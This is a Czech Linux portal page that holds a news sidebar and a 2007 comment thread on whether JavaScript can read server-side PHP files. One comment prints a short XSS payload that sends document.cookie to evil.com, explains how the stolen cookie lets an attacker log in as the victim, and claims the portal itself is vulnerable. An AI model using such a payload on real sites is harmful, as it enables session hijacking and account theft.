abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 03:55 | Nová verze

    Immich byl vydán v nové verzi 3.0.0. Jedná se o alternativu k výchozím aplikacím od Googlu a Applu pro správu fotografií a videí umožňující vlastní hosting serveru Immich. K vyzkoušení je demo. Immich je součástí balíčků open source aplikací FUTO. Zdrojové kódy jsou k dispozici na GitHubu pod licencí AGPL-3.0.

    Ladislav Hagara | Komentářů: 3
    dnes 02:55 | IT novinky

    Společnost Juno Computers prodávající počítače s předinstalovaným Linuxem má nově v nabídce linuxový tablet Juno Tab 4 - WiFi. Na výběr je Debian, Ubuntu a Kubuntu. Předobjednat jej lze za 949 liber (26 500 korun).

    Ladislav Hagara | Komentářů: 0
    dnes 01:22 | Nová verze

    Podman (Pod Manager), nástroj umožňující vytvářet a provozovat kontejnery, aniž by uživatel potřeboval práva roota, byl vydán v nové major verzi 6.0.0. Přehled novinek v poznámkách k vydání. Řešena je i vážná bezpečnostní chyba CVE-2026-57231.

    Ladislav Hagara | Komentářů: 0
    dnes 00:11 | IT novinky

    Společnost Sony oznámila, že od ledna 2028 přestane vydávat nové hry pro PlayStation na fyzických discích. Všechny budoucí tituly budou dostupné výhradně v digitální podobě na PlayStation Store.

    Ladislav Hagara | Komentářů: 2
    včera 16:55 | Nová verze

    Google Chrome 150 byl prohlášen za stabilní. Nejnovější stabilní verze 150.0.7871.46 přináší řadu novinek. Podrobný přehled v poznámkách k vydání. Opraveno bylo 433 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    včera 13:00 | Nová verze

    Soudní dvůr Evropské unie potvrdil rekordní pokutu 4,125 miliardy eur (100 miliard Kč) americké technologické firmě Google ze skupiny Alphabet. Pokutu firmě v roce 2018 vyměřila Evropská komise (EK) za to, že Google podle ní zneužívá operačního systému Android k potlačení konkurence na trhu vyhledávacích služeb.

    Ladislav Hagara | Komentářů: 17
    včera 12:44 | IT novinky

    Administrativa amerického prezidenta Donalda Trumpa povolila firmě Anthropic obnovit plný přístup klientů k modelům umělé inteligence (AI) Fable 5 a Mythos 5. Ty byly nedostupné bezmála tři týdny kvůli bezpečnostním obavám vlády, třebaže americké ministerstvo obchodu minulý pátek povolilo omezený přístup k modelu Mythos 5 pro některé „důvěryhodné“ domácí organizace.

    Ladislav Hagara | Komentářů: 1
    včera 12:22 | Zajímavý článek

    Francúzska organizácia na ochranu spotrebiteľa, po viac než ôsmych rokoch skúmania, žaluje Epson za plánované zastarávanie tlačiarní. Súd sa začína dnes, 2. 7. 2026, vo francúzskom Nanterre.

    Vlado99 | Komentářů: 5
    včera 03:00 | Zajímavý software

    Erin Catto, autor open source 2D fyzikálního enginu Box2D (Wikipedie), představil nový 3D fyzikální engine Box3D. Engine je již používán ve hře The Legend of California.

    Ladislav Hagara | Komentářů: 0
    včera 01:00 | Nová verze

    Byla vydána nová verze 4.0.0 multiplatformního svobodného frameworku pro zpracování obrazu G'MIC (GREYC's Magic for Image Computing, Wikipedie). Přehled novinek i s náhledy nových filtrů na PIXLS.US.

    Ladislav Hagara | Komentářů: 1
    Které desktopové prostředí na Linuxu používáte?
     (11%)
     (8%)
     (2%)
     (17%)
     (31%)
     (4%)
     (6%)
     (2%)
     (16%)
     (26%)
    Celkem 2044 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník
    Štítky: není přiřazen žádný štítek

    .

    28.12.2007 01:18 | asdgf | poslední úprava: 26.11.2009 20:42

    .        

    Hodnocení: 14 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    progdan avatar 28.12.2007 01:40 progdan | skóre: 34 | blog: Archař | Teplice/Brno
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Nejsem si zcela jisty, ale k souborum myslim JavaScript do urcite miry pristupovat dokaze. Cim sem si vsak jisty, nedokaze pristoupit k souboru php. Tedy dokaze, ale ziska pouze koncovy (X)HTML (nebo jiny) vystup, nikdy vsak samotny kod souboru - to nelze zadnym zpusobem ani jazykem (krome prolomeni hesla na FTP a stazeni souboru ale to uz je neco trochu jinyho)
    Collecting data is only the first step toward wisdom, but sharing data is the first step toward the community.
    unknown_ avatar 28.12.2007 01:43 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Dík, myslel sem, že pokud k tomu dokáže přistoupit, tak jako k plain textu, protože html výstup už mám :-)
    unknown_ avatar 28.12.2007 01:45 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    K tomu přístupu k .php, mělo by to jít pomocí php funkce readfile()?
    Josef Kufner avatar 28.12.2007 01:54 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    K souborům by jsi se neměl dostat ani na straně klienta a už vůbec ne na straně serveru. Pokud se ti to povede, tak to nahlaš jako obrovskou bezpečnostní díru.
    Hello world ! Segmentation fault (core dumped)
    unknown_ avatar 28.12.2007 01:59 unknown_ | skóre: 30 | blog: blog
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    To se mi nepovede už proto, že se tím asi dál zabývat nebudu, jen sem se trochu nudil, takže je mi to docela jedno. Jenom škoda, mohl z toho být poprask. Ale na to XSS je náchylnej snad každej druhej server :-/
    Přemek Vyhnal avatar 28.12.2007 01:59 Přemek Vyhnal | skóre: 24 | blog: Toto není blog! | Dobřichovice
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Můžu pomocí javascriptu zobrazit index.php?
    Javascript běží u klienta - v prohlížeči.

    Ale kdyz ho dokazes vlozit do nejaky stranky tak aby se zobrazil i jinym navstevnikum tak muzes napriklad ukrast prihlasovaci susenku.
    <script>
    location.href="http://evil.com/sendtomail.php?cookie="+document.cookie; 
    </script>
    
    Tohle presmeruje navstevnika na utocnikuv server na script kterej parametry co dostane pres GET posle na mail (treba). Utocnik si pak to co mu prijde nastavi jako svoji susenku a rychle nez se obet odhlasi se pujde s tou susenkou podivat na ten web a bude prihlasenej jako uzivatel kterymu to ukrad.

    ..ale je to lamarna .)

    BTW jde to i na abclinuxu
    NO RAPTORS!
    28.12.2007 10:37 Ritchie | skóre: 27 | blog: Ritchie's | Berlin
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Samozřejmě, že lze pomocí javascriptu otevřít soubor, stačí vytvořit objekt File. Ovšem ne všechny implementace javascriptu povolují vytvořit takový objekt, například implementace javascriptu v prohlížečích z pochopitelných důvodů soubory otevírat neumožňují.

    Nemusím snad psát, že abyste mohl otevřít soubor, musíte mít přístup k souborovému systému, kde se soubor nachází. Pokud máte představu, že HTTP zpřístupňuje souborový systém serveru, doporučuji si přečíst alespoň úvod k tomuto protokolu. Zabralo by vám to jistě méně času, než napsání nesmyslného příspěvku do blogu.
    28.12.2007 11:51 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Btw neznáte nějaký přehled javascriptových funkcí? Nerad bych swe zdržoval věcma jako že a=1, b=2, a+b=3; to je ve všech jazycích stejný. Potřeboval bych nějaký přehled všech funkcí javascriptu. Nevíte o něčem takovým? … Co udělat na webu, hacknutelného přes XSS, když nemůžu nahradit index?
    Nechat ten hacknutelný web na pokoji, a jít studovat základy. Základy programování, základy HTML a souvisejících věcí, co je to JavaScript a co jsou různé jeho implementace. Pak taky můžete trénovat vyhledávání Googlem (to abyste se nemusel shánět po manuálech k JavaScriptu, když vám jich Google najde několik stránek). Až to všechno budete mít nastudované, zjistěte si taky, co je to XSS – doufám, že po prostudování všeho předešlého už nebudete zklamaný z toho, že XSS není to, co hledáte.
    28.12.2007 22:34 Mazarik
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Pokial Javascript chcete pouzit ako jazyk na serveri(nieco v style php), tak sa samozrejme subory otvarat daju. Pokial chcete pracovat so subormi na html stranke na strane klienta, tak to ide imho maximalne pomocou html input type="file" tusim, kde sa Vam otvori file dialog. Na ine operacie so subormi na strane klienta potrebujete vacsie prava, ktore musi povolit uzivatel. Aj ked som presne nepochopil o co Vam vlastne ide, tak pravdepodobne chcete presmerovat stranku pomocou javascriptu na inu stranku. Tak to sa robi napriklad document.location.href="_adresa_"
    28.12.2007 22:36 Mazarik
    Rozbalit Rozbalit vše Re: Javascript + přístup k souborům
    Este celkom dobra a dokumentacia Javascriptu, ktora funguje vo vsetkych prehliadacoch, je na stranke http://devguru.com/technologies/javascript/home.asp

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.